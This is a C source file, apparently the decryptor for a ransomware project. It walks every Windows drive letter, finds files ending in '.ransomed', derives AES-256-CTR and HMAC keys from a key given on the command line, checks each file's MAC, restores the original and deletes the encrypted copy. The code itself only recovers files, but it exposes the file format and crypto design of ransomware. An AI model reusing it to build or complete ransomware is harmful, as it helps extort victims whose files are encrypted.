#include <errno.h>
#include <ftw.h>
#include <openssl/err.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <openssl/kdf.h>
#include <openssl/rand.h>
#include <openssl/sha.h>
#include <share.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

#define PRINT_ERROR(err_msg)                                                   \
  { fprintf(stderr, "%s:%s:%d: %s\n", __FILE__, __func__, __LINE__, err_msg); }

#define PRINT_FILE_ERROR(fileName, err_code)                                   \
  {                                                                            \
    fprintf(stderr, "%s: %s (Line: %i)\n", fileName, strerror(err_code),       \
            __LINE__);                                                         \
  }

#define PRINT_SYS_ERROR(err_code)                                              \
  {                                                                            \
    fprintf(stderr, "%s:%s:%d: %s\n", __FILE__, __func__, __LINE__,            \
            strerror(err_code));                                               \
  }

#define EXTENSION ".ransomed"

const EVP_CIPHER *cipher = NULL;
unsigned char key[EVP_MAX_KEY_LENGTH] = {0};
unsigned char iv[EVP_MAX_IV_LENGTH] = {0};
unsigned char mac[SHA256_DIGEST_LENGTH] = {0};
unsigned char gmac[SHA256_DIGEST_LENGTH] = {0};
unsigned char hmac_key[SHA256_DIGEST_LENGTH] = {0};
const EVP_MD *digest;

EVP_CIPHER_CTX *ctx;

unsigned char salt[SHA256_DIGEST_LENGTH];

unsigned char random_key[SHA256_DIGEST_LENGTH];

int file_crypt(const char *file_name) {
  struct stat st;
  stat(file_name, &st);

  size_t file_size = st.st_size;
  unsigned int buffer_size = 1024;
  int outlen = 0, inlen = 0;

  unsigned char in_buffer[buffer_size + EVP_MAX_BLOCK_LENGTH];
  unsigned char out_buffer[buffer_size + EVP_MAX_BLOCK_LENGTH];

  FILE *file = fopen(file_name, "rb");
  if (file == NULL) {
    PRINT_FILE_ERROR(file_name, errno);
    return 1;
  }

  /* Seek to end of file and read salt and mac footer */
  fseek(file, ((sizeof(salt) + sizeof(mac)) * (-1)), SEEK_END);
  fread(salt, sizeof(char), sizeof(salt), file);
  fread(mac, sizeof(char), sizeof(mac), file);

  fclose(file);

  /* Correct file size to exclude salt and mac */
  file_size -= sizeof(salt) + sizeof(mac);

  cipher = EVP_get_cipherbyname("aes-256-ctr");
  digest = EVP_get_digestbyname("sha512");

  if (!PKCS5_PBKDF2_HMAC((char *)random_key, SHA256_DIGEST_LENGTH, salt,
                         sizeof(salt), 1000, digest,
                         EVP_CIPHER_key_length(cipher), key)) {
    OPENSSL_cleanse(key, sizeof(key));
    return 1;
  }

  if (EVP_CIPHER_iv_length(cipher) != 0) {
    if (!PKCS5_PBKDF2_HMAC((char *)random_key, SHA256_DIGEST_LENGTH, salt,
                           sizeof(salt), 1, digest,
                           EVP_CIPHER_iv_length(cipher), iv)) {
      OPENSSL_cleanse(key, sizeof(key));
      return 1;
    }
  }

  /* Derive separate authentication key */
  EVP_PKEY_CTX *pctx;

  size_t pkey_outlen = sizeof(hmac_key);
  pctx = EVP_PKEY_CTX_new_id(EVP_PKEY_HKDF, NULL);

  if (EVP_PKEY_derive_init(pctx) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_CTX_set_hkdf_md(pctx, EVP_sha256()) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_CTX_set1_hkdf_key(pctx, key, sizeof(key)) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_CTX_add1_hkdf_info(pctx, "authkey", strlen("authkey")) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }
  if (EVP_PKEY_derive(pctx, hmac_key, &pkey_outlen) <= 0) {
    OPENSSL_cleanse(key, sizeof(key));
    EVP_PKEY_CTX_free(pctx);
    return 1;
  }

  EVP_PKEY_CTX_free(pctx);

  HMAC_CTX *hmac_ctx = HMAC_CTX_new();
  HMAC_Init_ex(hmac_ctx, hmac_key, sizeof(hmac_key), EVP_sha256(), NULL);

  HMAC_Update(hmac_ctx, iv, EVP_CIPHER_iv_length(cipher));

  file = fopen(file_name, "rb");
  if (file == NULL) {
    PRINT_FILE_ERROR(file_name, errno);
    return 1;
  }

  int64_t remaining = file_size;
  while (remaining) {

    if (buffer_size > remaining)
      buffer_size = remaining;

    fread(in_buffer, sizeof(char), buffer_size, file);

    if (!HMAC_Update(hmac_ctx, in_buffer, buffer_size)) {
      PRINT_ERROR("HMAC Failed\n");
      ERR_print_errors_fp(stderr);
      HMAC_CTX_free(hmac_ctx);
      fclose(file);
      return 1;
    }

    remaining -= buffer_size;
  }

  unsigned int hmac_len = file_size + EVP_CIPHER_iv_length(cipher);

  if (!HMAC_Final(hmac_ctx, gmac, &hmac_len)) {
    PRINT_ERROR("HMAC Failed\n");
    ERR_print_errors_fp(stderr);
    HMAC_CTX_free(hmac_ctx);
    fclose(file);
    return 1;
  }

  HMAC_CTX_free(hmac_ctx);

  fclose(file);

  if (CRYPTO_memcmp(mac, gmac, sizeof(mac)) != 0) {
    printf("Authentication Failed: %s\n", file_name);
    return 1;
  }

  ctx = EVP_CIPHER_CTX_new();
  EVP_CIPHER_CTX_init(ctx);

  EVP_CipherInit_ex(ctx, cipher, NULL, key, iv, 0);

  /* Make new_file_name equal to file_name minus EXTENSION */
  int removal_amount = strlen(file_name) > strlen(EXTENSION)
                           ? strlen(file_name) - strlen(EXTENSION)
                           : strlen(EXTENSION) - strlen(file_name);
  char new_file_name[removal_amount + 1];
  new_file_name[removal_amount] = '\0';
  strncpy(new_file_name, file_name, removal_amount);

  chmod(file_name, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);

  /* I have no idea what is going on here... But on windows this will
   * always return NULL and sterror will say 'Permission Denied', yet
   * decrypted data gets written to the file as if it was ignoring
   * return, but was simply leaving the encrypted file behind. If I
   * ignore the NULL value and do not return or print sterror, then
   * it writes the decrypted data and removes the encrypted file.
   * Probably some kind of undefined/implementation-defined behavior.
   * */
  FILE *new_file = _fsopen(new_file_name, "wb", _SH_DENYNO);
  if (new_file == NULL) {
    // PRINT_FILE_ERROR(new_file_name, errno);
    // return 1;
  }

  chmod(new_file_name,
        S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);

  file = fopen(file_name, "rb");
  if (file == NULL) {
    PRINT_FILE_ERROR(file_name, errno);
    return 1;
  }

  remaining = file_size;
  while (1) {

    if (remaining <= 0)
      break;

    if (buffer_size > remaining)
      buffer_size = remaining;

    inlen = fread(in_buffer, sizeof(char), buffer_size, file);

    if (!EVP_CipherUpdate(ctx, out_buffer, &outlen, in_buffer, inlen)) {
      PRINT_ERROR("Decryption Failed\n");
      ERR_print_errors_fp(stderr);
      EVP_CIPHER_CTX_cleanup(ctx);
      fclose(file);
      fclose(new_file);
      return 1;
    }

    if (fwrite(out_buffer, sizeof(char), outlen, new_file) != outlen) {
      if (ferror(new_file))
        PRINT_FILE_ERROR(file_name, errno);
    }

    remaining -= buffer_size;
  }

  if (remaining < 0) {
    buffer_size = remaining * (-1);

    inlen = fread(in_buffer, sizeof(char), buffer_size, file);

    if (!EVP_CipherUpdate(ctx, out_buffer, &outlen, in_buffer, inlen)) {
      PRINT_ERROR("Decryption Failed\n");
      ERR_print_errors_fp(stderr);
      EVP_CIPHER_CTX_cleanup(ctx);
      fclose(file);
      fclose(new_file);
      return 1;
    }

    if (fwrite(out_buffer, sizeof(char), outlen, new_file) != outlen) {
      if (ferror(new_file))
        PRINT_FILE_ERROR(file_name, errno);
    }
  }

  if (!EVP_CipherFinal_ex(ctx, out_buffer, &outlen)) {
    PRINT_ERROR("Decryption Failed\n");
    ERR_print_errors_fp(stderr);
    EVP_CIPHER_CTX_cleanup(ctx);
    fclose(file);
    fclose(new_file);
    return 1;
  }

  if (fwrite(out_buffer, sizeof(char), outlen, new_file) != outlen) {
    if (ferror(new_file))
      PRINT_FILE_ERROR(file_name, errno);
  }

  EVP_CIPHER_CTX_cleanup(ctx);

  fclose(file);
  fclose(new_file);

  remove(file_name);

  return 0;
}

static int traverse_dir(const char *fpath, const struct stat *sb, int tflag) {
  /* Only decrypt physical files with extension EXTENSION */
  if (tflag == FTW_F) {
    if (strstr(fpath, EXTENSION) != NULL) {
      file_crypt(fpath);
    }
  }

  return 0;
}

int main(int argc, char *argv[]) {

  if (argc < 2) {
    printf("use: %s key\n", argv[0]);
    return 1;
  }

  OpenSSL_add_all_algorithms();

  EVP_DecodeBlock(random_key, argv[1], strlen(argv[1]));

  /* Make array of drive letters to cycle through */
  char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
  char drive_letter[5];

  /* Loop through drive letters and run ftw on all of them */
  for (int i = 0; i < strlen(alphabet); i++) {
    memset(drive_letter, '\0', sizeof(drive_letter));
    drive_letter[0] = alphabet[i];
    strcat(drive_letter, ":\\");
    ftw(drive_letter, traverse_dir, 1);
  }

  exit(EXIT_SUCCESS);
}
